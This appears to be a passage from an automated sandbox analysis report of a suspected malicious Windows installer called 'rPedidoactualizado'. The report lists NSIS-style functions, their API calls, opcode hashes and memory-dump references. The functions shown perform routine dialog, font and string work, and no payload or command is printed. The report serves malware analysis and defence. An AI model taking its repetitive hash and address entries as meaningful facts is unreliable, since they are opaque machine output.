Opcode ID: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
Instruction ID: 9b62f472eb3a95df078ad497759be9c31f6c15c11f60cf08f6005a6c9cb4e6e4
Opcode Fuzzy Hash: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
Instruction Fuzzy Hash: 9921BFB1C00128BBCF116FA5DE49D9E7E79EF09364F14423AF960762E0CB794C419B98

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
Opcode Fuzzy Hash: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18

Function 00404ABB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
wsprintfW.USER32 ref: 00404B65
SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78

Strings

%u.%u%s%s, xrefs: 00404B46

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
Opcode Fuzzy Hash: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8

Function 00402598 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00000400,?,?,00000021), ref: 004025E8
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00000400,?,?,00000021), ref: 004025F3

Strings

C:\Users\user\AppData\Local\Temp\nsx2132.tmp, xrefs: 004025B3, 004025DA, 004025EE, 0040263A

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsx2132.tmp
API String ID: 3109718747-3603578921
Opcode ID: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
Instruction ID: 4bb1670e371a3de23f361dcee459543bcfcf4636ee0f51b5b5a9e7d0ab821041
Opcode Fuzzy Hash: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
Instruction Fuzzy Hash: DB11CB72A05300BEDB046FB18E8999F7664AF54399F20843FF502F61D1D9FC89415B5E

Function 00405C17 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C25
CharNextW.USER32(00000000), ref: 00405C2A
CharNextW.USER32(00000000), ref: 00405C42

Strings

C:\Users\user\AppData\Local\Temp\nsx2132.tmp, xrefs: 00405C18

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsx2132.tmp
API String ID: 3213498283-3603578921
Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA

Function 00405B6C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 00405B72
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 00405B7C
lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B8E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6C

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction ID: 803477e47080facc391f0cecd2807ccdb00b9d1fdb40608b9d44cb66137c19bb
Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction Fuzzy Hash: 3BD0A731501A30AAC111BB449D04DDF72ACDE45304342047FF101B31A2C7BC2D5287FD

Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
GetTickCount.KERNEL32 ref: 00402EAA
CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC

Function 00405C74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4

Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C25
Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405CCD
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 00405CDD

Strings

C:\Users\user\AppData\Local\Temp\nsx2132.tmp, xrefs: 00405C7A, 00405C7F, 00405C85, 00405CC6, 00405CCC, 00405CD4, 00405CDC

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsx2132.tmp
API String ID: 3248276644-3603578921
Opcode ID: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
Opcode Fuzzy Hash: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E

Function 00405273 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004052A2
CallWindowProcW.USER32(?,?,?,?), ref: 004052F3

Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C

Strings

, xrefs: 00405283

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E

Function 004038F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

